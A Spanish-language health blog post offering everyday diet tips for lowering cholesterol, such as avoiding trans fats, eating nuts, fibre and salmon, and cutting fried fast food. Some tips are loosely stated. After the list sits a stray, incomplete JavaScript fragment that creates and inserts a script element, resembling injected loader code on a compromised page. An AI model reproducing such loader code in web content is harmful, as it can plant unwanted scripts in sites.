Salud y belleza » Alimentación, Enfermedades

Trucos sencillos para bajar el colesterol

Sin Comentarios

Bueno y malo. Estos dos adjetivos calificativos no solo sirven para caracterizar a un ser humano: también puede ser perfectamente aplicables a la hora de hablar del colesterol pues, en efecto, existe el bueno y el malo (aunque, así en la vida social como en lo que se refiere a salud, bueno es un término relativo y malo también; la inocencia de esas palabras suena dudosa: los grises también existen).

Básicamente lo que significa, en términos médicos, eso de “bueno” y “malo” es lo siguiente: el HDL (o “el bueno”) facilita la conducción del colesterol fuera de los conductos sanguíneos. En cambio, el LDL (o “el malo”) funciona como deposito por lo tanto se acumula dentro de las paredes de sus arterias.

He aquí, entonces, algunos concejos, trucos o recomendaciones para mantener nuestro colesterol (el bueno, el malo, el buenísimo, el malísimo) en términos sanos…

  • Intente mantenerse alejado de los alimentos con ácidos grasos trans. Éstos no solo eleven el LDL: también reducen el HDL (excelente para matar dos pájaros de un tiro). ¿Cuáles son los alimentos que no debemos ni tocar? Algunos como mantecas y procesados que contengan aceite de soja hidrogenado y otros componentes.
  • Reemplace los modos de cocina poco saludables, por otro más sano como, por ejemplo, la plancha. Este sistema sirve para hacer una gran variedad de platos: desde hamburguesas hasta casi cualquier corte de carne (con esta práctica se evita el consumo excesivo de grasas).
  • Comience a comer, de forma regular, frutas secas. Las nueces, por mencionar un paradigma de este tipo de alimentos, son elevadas en grasas pero, claro, de las buenas. También las almendras y las avellanas son recomendables.
  • No cambie su hábito de comer postres: sino intente “compensar” ciertos gustos con otros. Esto es, básicamente, una cuestión de elección. Vuélquese a delicias como el bizcochuelo blanco, las galletas de harina de trigo, mermelada diet o yogurt. De esta manera, su organismo no sentirá la pérdida.
  • Consuma más alimentos ricos en fibra. Las opciones son variadas asíque no existen las excusas: pan de harina de trigo, harina de avena, cereales (bajos en colesterol), cualquiera de estas opciones sirven.
  • Incorpore pescado a su dieta. El salmón, por ejemplo, es especialmente bueno para bajar el colesterol. Busque, así, variedades de salmón rojo, rico en ácidos Omega-3 (grasa buena)
  • Reemplace los aceites peligrosos por otros más saludables como el aceite de oliva que ideal para la preparación de múltiples platos.
  • Quite por completo de su dieta, las comidas rápidas y las frituras ya que éstas elevarán su colesterol hasta puntos inimaginables. Evite esa horrible rutina y comience con las ensaladas (de hecho, en las casas de Fast-Food, por ley, se venden muchas ensaladas).

document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.